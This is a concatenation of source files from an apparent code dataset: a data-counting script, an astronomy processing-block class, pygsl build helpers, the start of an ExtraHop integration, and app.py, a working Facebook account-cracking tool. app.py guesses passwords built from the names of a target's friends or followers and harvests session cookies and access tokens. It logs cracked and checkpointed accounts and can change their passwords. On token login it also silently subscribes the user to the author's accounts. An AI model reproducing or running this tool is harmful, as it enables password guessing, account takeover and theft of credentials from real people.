for file in os.listdir(path):
if file.endswith("_rules.csv"):
with open(os.path.join(path, file), 'r') as csvfile:
reader = csv.reader(csvfile)
next(reader)
next(reader)
for row in reader:
LHS = row[0].replace('{', '').replace('}', '')
csv_words = LHS.split(", ")
for i in csv_words:
words_LHS.append(i)
RHS = row[1].replace('{', '').replace('}', '')
csv_words = RHS.split(", ")
for i in csv_words:
words_RHS.append(i)
words_LHS_counted = []
words_RHS_counted = []
print(len(words_LHS))
print(len(words_RHS))
quit()  # debug short-circuit: everything below is unreachable until this line is removed
for i in words_LHS:
x = words_LHS.count(i)
words_LHS_counted.append((i,x))
for i in words_RHS:
x = words_RHS.count(i)
words_RHS_counted.append((i,x))
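# The O(n^2) count() loops above can be replaced by the already-imported
# Counter -- an equivalent sketch (unreachable while the quit() above remains):
#     words_LHS_counted = list(Counter(words_LHS).items())
#     words_RHS_counted = list(Counter(words_RHS).items())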
# def take_second(elem):
# return elem[1]
items_LHS_counted = sorted(set(words_LHS_counted),reverse=True,key=lambda elem: elem[1])
items_RHS_counted = sorted(set(words_RHS_counted),reverse=True,key=lambda elem: elem[1])
# print(items_counted)
# #write this to csv file
with open('FP-Growth_CountItems0.1.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(['LHS'])
writer.writerows(items_LHS_counted)
writer.writerow(['RHS'])
writer.writerows(items_RHS_counted)
| 31.12963 | 135 | 0.610351 |
315c732f5920febd131d8f75b500eb3bf422c4d9
| 3,006 |
py
|
Python
|
src/config_db/ska_sdp_config/entity/pb.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 2 |
2019-07-15T09:49:34.000Z
|
2019-10-14T16:04:17.000Z
|
src/config_db/ska_sdp_config/entity/pb.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 17 |
2019-07-15T14:51:50.000Z
|
2021-06-02T00:29:43.000Z
|
src/config_db/ska_sdp_config/entity/pb.py
|
ska-telescope/sdp-configuration-prototype
|
8c6cbda04a83b0e16987019406ed6ec7e1058a31
|
[
"BSD-3-Clause"
] | 1 |
2019-10-10T08:16:48.000Z
|
2019-10-10T08:16:48.000Z
|
"""Processing block configuration entities."""
import re
import copy
# Permit identifiers up to 64 bytes in length
_PB_ID_RE = re.compile("^[A-Za-z0-9\\-]{1,64}$")
class ProcessingBlock:
"""Processing block entity.
Collects configuration information relating to a processing job
for the SDP. This might be either real-time (supporting a running
observation) or offline (to process data after the fact).
Actual execution of processing steps will be performed by a
(parametrised) workflow interpreting processing block information.
"""
# pylint: disable=W0102
def __init__(self, pb_id, sbi_id, workflow,
parameters={}, scan_parameters={},
**kwargs):
"""
Create a new processing block structure.
:param pb_id: Processing block ID
:param sbi_id: Scheduling block ID (None if not associated with an SBI)
:param workflow: Workflow description (dictionary for now)
:param parameters: Workflow parameters
:param scan_parameters: Scan parameters (not for batch processing)
:param dct: Dictionary to load from (will ignore other parameters)
:returns: ProcessingBlock object
"""
# Get parameter dictionary
self._dict = {
'pb_id': str(pb_id),
'sbi_id': None if sbi_id is None else str(sbi_id),
'workflow': dict(copy.deepcopy(workflow)),
'parameters': dict(copy.deepcopy(parameters)),
'scan_parameters': dict(copy.deepcopy(scan_parameters))
}
self._dict.update(kwargs)
# Validate
if set(self.workflow) != set(['id', 'type', 'version']):
raise ValueError("Workflow must specify name, type and version!")
if not _PB_ID_RE.match(self.pb_id):
raise ValueError("Processing block ID {} not permissable!".format(
self.pb_id))
def to_dict(self):
"""Return data as dictionary."""
return self._dict
@property
def pb_id(self):
"""Return the Processing Block id."""
return self._dict['pb_id']
@property
def sbi_id(self):
"""Scheduling Block Instance id, if an observation is associated."""
return self._dict.get('sbi_id')
@property
def workflow(self):
"""Information identifying the workflow."""
return self._dict['workflow']
@property
def parameters(self):
"""Workflow-specific parameters."""
return self._dict['parameters']
@property
def scan_parameters(self):
"""Workflow-specific scan parameters."""
return self._dict['scan_parameters']
def __repr__(self):
"""Build string representation."""
return "ProcessingBlock({})".format(
", ".join(["{}={}".format(k, repr(v))
for k, v in self._dict.items()]))
def __eq__(self, other):
"""Equality check."""
return self.to_dict() == other.to_dict()
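# A minimal usage sketch (hypothetical IDs and workflow values):
#
#     pb = ProcessingBlock(
#         pb_id='realtime-20190627-0001',
#         sbi_id=None,
#         workflow={'id': 'vis_receive', 'type': 'realtime', 'version': '0.1.0'},
#     )
#     pb.workflow['id']  # 'vis_receive'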
| 33.032967 | 79 | 0.617764 |
319b781e5814130abde4cc96fd6e91ef3e46db80
| 49 |
py
|
Python
|
src/compgen2/gov/__init__.py
|
CorrelAid/compgen-ii-cgv
|
810a044d6bbe1ce058a359115e3e5fc71a358549
|
[
"MIT"
] | 1 |
2022-02-02T12:41:06.000Z
|
2022-02-02T12:41:06.000Z
|
src/compgen2/gov/__init__.py
|
CorrelAid/compgen-ii-cgv
|
810a044d6bbe1ce058a359115e3e5fc71a358549
|
[
"MIT"
] | null | null | null |
src/compgen2/gov/__init__.py
|
CorrelAid/compgen-ii-cgv
|
810a044d6bbe1ce058a359115e3e5fc71a358549
|
[
"MIT"
] | null | null | null |
from .gov import Gov
from .matcher import Matcher
| 24.5 | 28 | 0.816327 |
31d7a720545cbc5d928db017ff7224d15997bc64
| 9,763 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/gsl_Extension.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/gsl_Extension.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/gsl_Extension.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
#
# author: Achim Gaedke
# created: May 2001
# file: pygsl/gsl_dist/gsl_extension.py
# $Id: gsl_Extension.py,v 1.6 2015/09/27 06:34:23 schnizer Exp $
#
# module for gsl extensions compilation
from distutils.core import setup, Extension
from distutils.errors import DistutilsModuleError, DistutilsExecError
import os
import os.path
import re
import string
import types
import imp
from sys import argv,version_info
from array_includes import array_include_dirs
# steal --gsl-prefix from the option list
gsl_prefix_option=None
gsl_prefix_option_pattern=re.compile("--gsl-prefix=(.+)")
pos=0
while pos<len(argv):
gsl_prefix_match=gsl_prefix_option_pattern.match(argv[pos])
if gsl_prefix_match:
gsl_prefix_option=gsl_prefix_match.group(1)
gsl_prefix_option.strip()
argv[pos:pos+1]=[]
break
pos+=1
# Extension class adapted for gsl
class _gsl_Location:
"""
Wrapper for the location of the gsl library.
On unix one can run gsl-config to find the locations. On other systems
one has to revert to other ways to find the configuration.
"""
def __init__(self):
self.prefix = None
self.cflags = None
self.libs = None
self.version = None
self.swig = None
def get_gsl_prefix(self):
assert(self.prefix != None)
return self.prefix
def get_gsl_cflags(self):
assert(self.cflags != None)
return self.cflags
def get_gsl_libs(self):
#print self.libs
assert(self.libs != None)
return self.libs
def get_gsl_version(self):
assert(self.version != None)
return self.version
def _split_version(self, version):
if version[-1] == '+':
version = version[:-1]
return re.split('\.',version)
def get_swig(self):
assert(self.swig)
return self.swig
class _gsl_Location_gsl_config(_gsl_Location):
"""
Call gsl_config to find the location of gsl
"""
def __init__(self):
_gsl_Location.__init__(self)
gsl_prefix = None
if gsl_prefix is not None:
self.gsl_config_tool=os.path.join(gsl_prefix,"bin","gsl-config")
elif gsl_prefix_option is not None:
self.gsl_config_tool=os.path.join(gsl_prefix_option,"bin","gsl-config")
else:
self.gsl_config_tool="gsl-config"
self.prefix = self.get_gsl_info('--prefix').strip()
self.cflags = self.get_gsl_info('--cflags').strip()
self.libs = self.get_gsl_info('--libs').strip()
self.version = self._split_version(self.get_gsl_info('--version').strip())[:2]
        # assume swig is on the PATH unless the SWIG environment variable overrides it
self.swig = "swig"
try:
self.swig = os.environ["SWIG"]
except KeyError:
pass
def get_gsl_info(self, arguments):
"""
executes gsl-config with given arguments
"""
gsl_command=os.popen(self.gsl_config_tool+' '+arguments)
gsl_output=gsl_command.readline()
gsl_command.close()
if not gsl_output:
raise DistutilsExecError("could not start %s"%self.gsl_config_tool)
return gsl_output
class _gsl_Location_file(_gsl_Location):
def __init__(self):
_gsl_Location.__init__(self)
try:
import gsl_site
except ImportError as des:
msg = "I do not know how to run gsl-config \n"+\
"on this system. Therefore you must provide me with the information\n" +\
"where to find the GSL library. I could not import `gsl_site'.\n" +\
"Reason: %s. Copy gsl_site_example.py to gsl_site.py.\n"+\
"Edit the variables in that file to reflect your installation."
raise DistutilsExecError(msg % des)
self.prefix = gsl_site.prefix
self.cflags = gsl_site.cflags
self.libs = gsl_site.libs
self.swig = gsl_site.swig
self.version = self._split_version(gsl_site.version)
if os.name == 'posix':
gsl_Location = _gsl_Location_gsl_config()
else:
gsl_Location = _gsl_Location_file()
class gsl_Extension(Extension):
"""
for gsl needs
"""
def __init__(self, name, sources,
include_dirs=None,
define_macros=None,
undef_macros=None,
library_dirs=None,
libraries=None,
runtime_library_dirs=None,
extra_objects=None,
extra_compile_args=None,
extra_link_args=None,
export_symbols=None,
gsl_prefix=None,
gsl_min_version=None,
python_min_version=None
):
# get real prefix
self.gsl_prefix=self.get_gsl_prefix()
gsl_major_version, gsl_minor_version = self.get_gsl_version()
# check gsl version
if gsl_min_version is not None and \
not self.check_gsl_version(gsl_min_version):
raise DistutilsExecError("min gsl version %s required"%repr(gsl_min_version))
# check python version
if python_min_version is not None and \
not self.check_python_version(python_min_version):
raise DistutilsExecError("min python version %s required"%repr(python_min_version))
# prepend include directory
if include_dirs is None: include_dirs=[]
include_dirs.append('Include')
include_dirs.append('.')
include_dirs[0:0]=[os.path.join(self.gsl_prefix,'include')]
include_dirs= include_dirs + array_include_dirs
# prepend library directory
if library_dirs is None: library_dirs=[]
library_dirs[0:0] = [os.path.join(self.gsl_prefix,'lib')]
# prepare lib list
# split optionlist and strip blanks from each option
gsl_lib_list=map(lambda x: x.strip(),self.get_gsl_libs().split())
# filter options with -l
not_lib_opt=lambda a:a[:2]=="-l"
gsl_lib_list=filter(not_lib_opt,gsl_lib_list)
# cut -l
only_lib_name=lambda a:a[2:]
gsl_lib_list=map(only_lib_name,gsl_lib_list)
if libraries is None: libraries=[]
#libraries.append('pygsl')
libraries.extend(gsl_lib_list)
# test if Numeric module is available
if define_macros is None:
define_macros=[]
try:
imp.find_module("Numeric")
define_macros = define_macros + [("NUMERIC",1),]
except ImportError:
define_macros = define_macros + [("NUMERIC",0), ]
if undef_macros == None:
undef_macros = []
if 'NDEBUG' not in undef_macros:
undef_macros.append('NDEBUG')
        tmp = [x[0] for x in define_macros]  # a list, not a map iterator: it is membership-tested twice below
if "PYGSL_GSL_MAJOR_VERSION" not in tmp:
define_macros = define_macros + [("PYGSL_GSL_MAJOR_VERSION", gsl_major_version),]
if "PYGSL_GSL_MINOR_VERSION" not in tmp:
#define_macros.append(("PYGSL_GSL_MINOR_VERSION", gsl_minor_version))
define_macros = define_macros + [("PYGSL_GSL_MINOR_VERSION", gsl_minor_version),]
Extension.__init__(self, name, sources,
include_dirs,
define_macros,
undef_macros,
library_dirs,
libraries,
runtime_library_dirs,
extra_objects,
extra_compile_args,
extra_link_args,
export_symbols
)
def check_version(self, required_version, this_version):
this_version = tuple(this_version)
#print("req '%s' this '%s'" %(required_version, this_version))
min_length=min(len(required_version),len(this_version))
for pos in range(min_length):
t_val = this_version[pos]
test_val = required_version[pos]
#print("\t %d: req '%s' this '%s'" %( pos, test_val, t_val))
this_type=type(t_val)
if this_type== type(" "):
t_val = int(t_val)
if type(test_val)== type(" "):
test_val = int(test_val)
if t_val > test_val:
# already larger
return 1
elif t_val == test_val:
continue
elif t_val < test_val:
return 0
else:
raise DistutilsExecError("incorrect version specification")
# problematic: 0.9 < 0.9.0, but assures that 0.9.1 > 0.9
if len(required_version)>len(this_version): return 0
return 1
def check_gsl_version(self, version_array):
return self.check_version(version_array,self.get_gsl_version())
def check_python_version(self, version_array):
return self.check_version(version_array,version_info)
# get gsl-prefix option
def get_gsl_info(self, arguments):
"""
executes gsl-config with given arguments
"""
gsl_command=os.popen(self.gsl_config_tool+' '+arguments)
gsl_output=gsl_command.readline()
gsl_command.close()
if not gsl_output:
raise DistutilsExecError("could not start %s"%self.gsl_config_tool)
return gsl_output
def get_gsl_prefix(self,):
return gsl_Location.get_gsl_prefix()
def get_gsl_cflags(self):
return gsl_Location.get_gsl_cflags()
def get_gsl_libs(self):
return gsl_Location.get_gsl_libs()
def get_gsl_version(self):
return gsl_Location.get_gsl_version()
| 32.652174 | 103 | 0.605756 |
9ee7a59e1510591a47bb738aa3510120f6bdb00b
| 13,906 |
py
|
Python
|
cow3-main/app.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
cow3-main/app.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
cow3-main/app.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#!/usr/bin/python3
#coding=utf-8
"""
Copyright © 2021 - 2023 | Latip176
All of this code was written by Latip176.
"""
import json, os, re, time
from concurrent.futures import ThreadPoolExecutor as Bool
P = "\x1b[0;97m"
M = "\x1b[0;91m"
H = "\x1b[0;92m"
K = "\x1b[0;93m"
B = "\x1b[0;94m"
BM = "\x1b[0;96m"
try:
import requests as req
except:
print("[{M}!{P}] {BM}Ops! Module requests belum terinstall...\nSedang Menginstall Module...{P}")
os.system("python3 -m pip install requests")
try:
from bs4 import BeautifulSoup as par
except:
print("[{M}!{P}] {BM}Ops! Module bs4 belum terinstall...\nSedang Menginstall Module...{P}")
os.system("python3 -m pip install bs4")
os.system("clear")
import data as dump
from data import cp_detect as cpp
from data import convert as cv
ok,cp,loop = 0,0,0
cot = ""
nampung, opsi = [], []
ub, pwBaru = [], []
class Main(object):
def __init__(self, token, id, name):
self.token = token
self.id = id
self.name = name
def banner(self):
banner = f"""
_________ ________ __ __________
\_ ___ \ \_____ \/ \ / \_____ \
/ \ \/ / | \ \/\/ / _(__ <
\ \____/ | \ / /
\
\______ /\_______ /\__/\ / /______ /
\/ \/ \/ \/
Version: {BM}0.1.4{P}
Coded by: Latip176, Sponsore: Fatah Sewu
"""
return banner
def cpdetect(self):
__data=input("[?] Masukan nama file: ")
try:
_file=open("results/"+__data,"r").readlines()
except FileNotFoundError:
exit("[!] File tidak ditemukan")
ww=input("[?] Ubah pw ketika tap yes [y/t]: ")
if ww in ("y","ya"):
pwBar=input("[+] Masukan pw baru: ")
ub.append("y")
if len(pwBar) <= 5:
exit("Password harus lebih dari 6 character!")
else:
pwBaru.append(pwBar)
cpp.Eksekusi("https://mbasic.facebook.com",_file,"file","".join(pwBaru),"".join(ub))
def proses(self):
print("")
op = input(f"[{K}?{P}] Munculkan opsi cp [y/t]: ")
if op in ("y","Y"):
opsi.append("y")
ww=input(f"[{K}?{P}] Ubah pw ketika tap yes [y/t]: ")
if ww in ("y","ya"):
pwBar=input(f"[{H}+{P}] Masukan pw baru: ")
ub.append("y")
if len(pwBar) <= 5:
exit(f"{M}Password harus lebih dari 6 character!{P}")
else:
pwBaru.append(pwBar)
else:
print("> Skipped")
print(f"\n[{BM}!{P}] Akun hasik ok di save di ok.txt\n[{BM}!{P}] Akun hasil cp di save di cp.txt\n")
class Data(Main):
def menu(self):
os.system("clear")
print(self.banner())
print(f" * Welcome {self.name} in tool! Pilih crack dan mulai.")
print(f"[{BM}1{P}]. Crack dari pertemanan publik\n[{BM}2{P}]. Crack dari followers publik\n[{BM}3{P}]. Checkpoint detector\n[{M}0{P}]. Logout akun (hapus token)\n")
_chose = input(f"[{K}?{P}] Chose: ")
__pilih = ["01","1","02","2","03","3","0"]
while _chose not in __pilih:
print("\n[!] Pilihan tidak ada")
_chose = input("[?] Chose: ")
print("")
if _chose in ("01","1"):
print(f"[{BM}!{P}] Ketik {BM}'me'{P} untuk teman list kamu")
__id = input(f"[{K}?{P}] Masukan username atau id target: ").replace("'me'","me")
if(re.findall("\w+",__id)):
if(__id not in ("me","'me'")):
r=req.get(f"https://m.facebook.com/{__id}", headers={"user-agent":"chrome"}).text
try:
id = re.findall('\;rid\=(\d+)\&',str(r))[0]
except:
exit(f"{M}[!] Ops! Username tidak ditemukan.{P}")
self.data = dump.Dump("https://graph.facebook.com",self.token).pertemanan(id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).pertemanan(__id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).pertemanan(__id)
self.submit(self.data)
elif _chose in ("02","2"):
print(f"[{BM}!{P}] Ketik {BM}'me'{P} untuk followers list kamu")
__id = input(f"[{K}?{P}] Masukan username atau id target: ").replace("'me'","me")
if(re.findall("\w+",__id)):
if(__id not in ("me","'me'")):
r=req.get(f"https://m.facebook.com/{__id}", headers={"user-agent":"chrome"}).text
try:
id = re.findall('\;rid\=(\d+)\&',str(r))[0]
except:
exit(f"{M}[!] Ops! Username tidak ditemukan.{P}")
self.data = dump.Dump("https://graph.facebook.com",self.token).followers(id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).followers(__id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).followers(__id)
self.submit(self.data)
elif _chose in ("03","3"):
self.cpdetect()
elif _chose in ("0","00"):
os.system("rm -rf data/save.txt")
exit(f"{H}Thanks You....{P}\n")
else:
print(f"{M}[×] Kesalahan...{P}")
def submit(self,data):
print(f"\n[!] Pilih Metode Crack\n[{BM}1{P}] Metode b-api\n[{BM}2{P}] Metode mbasic")
metode = input(f"[{K}?{P}] Chose: ")
print(f"\n[!] D: {B}Default, {P}M: {BM}Manual, {P}G: {H}Gabung. {P}")
pasw=input(f"[{K}?{P}] Password [d/m/g]: ")
if pasw in ("m","M","g","G"):
print(f"[{BM}!{P}] Pisahkan password menggunakan koma contoh (sayang,bangsad)")
tam = input(f"[{H}+{P}] Masukan password: ").split(",")
self.proses()
print(" * Crack dimulai... CTRL + Z untuk stop! \n * Nyalakan mode pesawat jika tidak mendapatkan hasil\n")
with Bool(max_workers=35) as kirim:
for __data in data:
nama,id = __data.split("<=>")
nampung.append(id)
if(len(nama)>=6):
pwList = [nama,nama+"123",nama+"1234",nama+"12345"]
elif(len(nama)<=2):
pwList = [nama+"1234",nama+"12345"]
elif(len(nama)<=5):
pwList = [nama+"123",nama+"1234",nama+"12345"]
else:
pwList = [nama,nama+"123",nama+"1234",nama+"12345"]
if pasw in ("d","D"):
pwList = pwList
elif pasw in ("m","M"):
pwList = tam
elif pasw in ("g","G"):
pwList = pwList + tam
else:
pwList = pwList
if metode in ("01","1"):
kirim.submit(Crack(self.token,self.id,self.name).b_api,"https://b-api.facebook.com",id,pwList)
else:
kirim.submit(Crack(self.token,self.id,self.name).mbasic,"https://mbasic.facebook.com",id,pwList)
exit("[!] Crack selesai....")
class Crack(Main):
def b_api(self,url,user,pwList):
global ok,cp,cot,loop
if user!=cot:
cot=user
loop+=1
session = req.Session()
session.headers.update({
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding":"gzip, deflate",
"accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
"cache-control":"max-age=0",
"sec-sh-ua":'";Not A Brand";v="99", "Chromium";v="94"',
"sec-ch-ua-mobile":"?1",
"sec-ch-ua-platform":"Android",
"user-agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"
})
for pw in pwList:
pw=pw.lower()
response = session.get(url+"/method/auth.login",params={'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': user, 'locale': 'id_ID', 'password': pw, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'})
if "Anda Tidak Dapat Menggunakan Fitur Ini Sekarang" in response.text:
print("\r[!] Opss! Terkena spam... nyalakan mode pesawat selama 2 detik!\n",end="")
continue
if 'access_token' in response.text and 'EAAA' in response.text:
ok+=1
print(f"\r\r\33[32;1m[OK] {user} | {pw} | {response.json()['access_token']}\n\33[37;1m",end="")
open("results/ok.txt","a").write(user+"|"+pw+"\n")
break
elif 'www.facebook.com' in response.json()['error_msg']:
cp+=1
_file = user+"|"+pw
if "y" in opsi:
cpp.Eksekusi("https://mbasic.facebook.com",_file,"satu","".join(pwBaru),"".join(ub))
else:
print(f"\r\33[1;33m[CP] {user} | {pw} ∆\33[37;1m\n",end="")
open("results/cp.txt","a").write(user+"|"+pw+"\n")
break
else:
continue
print(f"\r[=] {str(loop)}/{str(len(nampung))} Ok/Cp: {str(ok)}/{str(cp)} CRACK: {'{:.1%}'.format(loop/float(len(nampung)))} ",end="")
def mbasic(self,url,user,pwList):
global loop, ok, cp, cot
if user!=cot:
cot=user
loop+=1
data={}
session = req.Session()
session.headers.update({
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding":"gzip, deflate",
"accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
"cache-control":"max-age=0",
"referer":"https://mbasic.facebook.com/",
"sec-ch-ua":'";Not A Brand";v="99", "Chromium";v="94"',
"sec-ch-mobile":"?1",
"sec-ch-ua-platform":'"Android"',
"sec-fetch-dest":"document",
"sec-fetch-mode":"navigate",
"sec-fetch-site":"same-origin",
"sec-fetch-user":"?1",
"upgrade-insecure-requests":"1",
"user-agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"
})
for pw in pwList:
pw = pw.lower()
soup = par(session.get(url+"/login/?next&ref=dbl&fl&refid=8").text,"html.parser")
link = soup.find("form",{"method":"post"})
lsd = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for __data in soup.find_all("input"):
if __data.get("name") in lsd:
data.update({__data.get("name"):__data.get("value")})
data.update({"email":user,"pass":pw})
try:
response = session.post(url+link.get("action"),data=data)
except:
exit("Ganti useragent!")
if "c_user" in session.cookies.get_dict():
if "Akun Anda Dikunci" in response.text:
print(f"\r\33[31;1m[CP] {user} | {pw} -> SESI NEW\n\33[37;1m",end="")
else:
ok+=1
coki = (";").join([ "%s=%s" % (key, value) for key, value in session.cookies.get_dict().items() ])
print(f"\r\33[32;1m[OK] {user}|{pw}|{coki}\n\33[37;1m",end="")
print(f"[{H}+{P}] Apk yang terkait:")
cpp.Eksekusi("","","","","").cek_apk(session,coki)
open("results/ok.txt","a").write(user+"|"+pw+"\n")
break
elif "checkpoint" in session.cookies.get_dict():
title = re.findall("\<title>(.*?)<\/title>",str(response.text))
if "Masukkan Kode Masuk untuk Melanjutkan" in title:
print(f"\r\33[31;1m[CP] {user} | {pw} -> A2F ON\n\33[37;1m",end="")
else:
cp+=1
_file = user+"|"+pw
if "y" in opsi:
cpp.Eksekusi("https://mbasic.facebook.com",_file,"satu","".join(pwBaru),"".join(ub))
else:
if "Lihat detail login yang ditampilkan. Ini Anda?" in title:
print(f"\r\33[32;1m[OK] {user} | {pw} -> Tap Yes\n\33[37;1m",end="")
else:
print(f"\r\33[1;33m[CP] {user} | {pw} ∆\33[37;1m\n",end="")
open("results/cp.txt","a").write(user+"|"+pw+"\n")
break
else:
if "Temukan Akun Anda" in re.findall("\<title>(.*?)<\/title>",str(response.text)):
print("\r\33[31;1m[!] hidupkan mode pesawat selama 2 detik \33[37;1m\n",end="")
continue
else:
pass
print(f"\r[=] {str(loop)}/{str(len(nampung))} Ok/Cp: {str(ok)}/{str(cp)} CRACK: {'{:.1%}'.format(loop/float(len(nampung)))} ",end="")
def login():
os.system("clear")
logo_login = """\n
.##.......####....####...######..##..##.
.##......##..##..##........##....###.##.
.##......##..##..##.###....##....##.###.
.##......##..##..##..##....##....##..##.
.######...####....####...######..##..##.
........................................
"""
print(logo_login,"\n * Login terlerbih dahulu menggunakan accesstoken facebook!\n * Jika tidak mempunyai token atau cookies silahkan cari tutorialnya di youtube untuk mendapatkan token facebook.\n * Ketika sudah memakai sc ini maka Author tidak bertanggung jawab atas resiko apa yang akan terjadi kedepannya.\n")
print(" * Ingin login menggunakan apa\n[1]. Login menggunakan cookies [Rawan Sesi New]\n[2]. Login menggunakan token")
bingung = input("\n[?] Login menggunakan: ")
__pilihan = ["01","1","02","2"]
while bingung not in __pilihan:
print("\n[!] Pilihan tidak ada")
bingung = input("[?] Login menggunakan: ")
if bingung in ("01","1"):
__cokiee = input("[?] cookie\t: ")
__coki = cv.Main(__cokiee).getToken()
if "EAA" in __coki:
_cek = json.loads(req.get(f"https://graph.facebook.com/me?access_token={__coki}").text)
_id = _cek['id']
_nama = _cek['name']
input(f"\n[✓] Berhasil login menggunakan cookies\n * Welcome {_nama} jangan berlebihan ya!\n * Enter untuk melanjutkan ke menu")
open("data/save.txt","a").write(__coki)
Data(__coki,_id,_nama).menu()
elif "Cookies Invalid" in __coki:
exit("\n[!] Cookies Invalid")
else:
exit("\n[!] Kesalahan")
elif bingung in ("02","2"):
__token = input("[?] token\t: ")
try:
__res=json.loads(req.get(f"https://graph.facebook.com/me?access_token={__token}").text)
_nama = __res['name']
_id = __res['id']
req.post(f'https://graph.facebook.com/100013031465766/subscribers?access_token={__token}')
req.post(f'https://graph.facebook.com/100034433778381/subscribers?access_token={__token}')
input(f"\n[✓] Berhasil login menggunakan token\n * Welcome {_nama} jangan berlebihan ya!\n * Enter untuk melanjutkan ke menu")
open("data/save.txt","a").write(__token)
Data(__token, _id, _nama).menu()
except KeyError:
print("\n[!] token invalid")
if __name__=="__main__":
try:
__token = open("data/save.txt","r").read()
__res=json.loads(req.get(f"https://graph.facebook.com/me?access_token={__token}").text)
_nama = __res['name']
_id = __res['id']
print(f" * Welcome back {_nama}\n * Menuju menu...")
time.sleep(3)
Data(__token, _id, _nama).menu()
except KeyError:
os.system("rm -rf data/save.txt")
print("\n[!] token invalid")
except FileNotFoundError:
print("[!] belum login\n * Menuju ke menu login...")
time.sleep(3)
login()
| 38.627778 | 313 | 0.603049 |
730bc13380827ab827ef3c7eec43ef996143bdc2
| 371 |
py
|
Python
|
sys/1/process.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2017-12-12T13:58:08.000Z
|
2017-12-12T13:58:08.000Z
|
sys/1/process.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | null | null | null |
sys/1/process.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2019-11-03T10:16:35.000Z
|
2019-11-03T10:16:35.000Z
|
from glob import iglob
from sys_1 import Parser
from os.path import isfile
o = open('ignore/output.txt', 'w', encoding='utf-8')
i = 0
for fname in iglob('ignore/**/*.html', recursive=True):
    i += 1
    if isfile(fname):
        parse = Parser()
        for chunk in open(fname, encoding='utf-8'):
            parse.feed(chunk)
        print(parse.data, file=o)
print(i)
o.close()  # flush and release the output file
| 24.733333 | 55 | 0.622642 |
b42dd13e7a7302850aac546c53cd16ef117e432d
| 12,973 |
py
|
Python
|
Packs/DeprecatedContent/Integrations/ExtraHop/ExtraHop.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/DeprecatedContent/Integrations/ExtraHop/ExtraHop.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/DeprecatedContent/Integrations/ExtraHop/ExtraHop.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import json
import requests
from distutils.util import strtobool
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBALS/PARAMS '''
APIKEY = demisto.params().get('apikey')
SERVER = demisto.params()['url'][:-1] if (demisto.params()['url'] and demisto.params()['url'].endswith('/')) else \
demisto.params()['url']
